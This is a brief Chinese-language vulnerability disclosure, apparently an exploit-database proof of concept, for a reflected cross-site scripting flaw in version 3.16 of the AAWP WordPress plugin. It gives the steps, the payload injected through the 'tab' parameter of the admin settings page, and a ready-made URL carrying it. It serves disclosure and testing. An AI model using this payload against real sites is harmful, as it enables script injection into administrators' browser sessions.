供应商主页:https://getaawp.com/
软件链接:https://getaawp.com/
版本:3.16
测试于:Windows 10 - Chrome、WordPress 5.8.2
概念证明:
1- 安装并激活 AAWP 3.16 插件。
2- 转到 https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
3- 添加payload到Tab,XSS Payload:"onclick=prompt(8)>
4- XSS 已被触发。
转到这个网址“http://localhost/wp-admin/admin.php?page=aawp-settings&tab="onclick=prompt(8)>
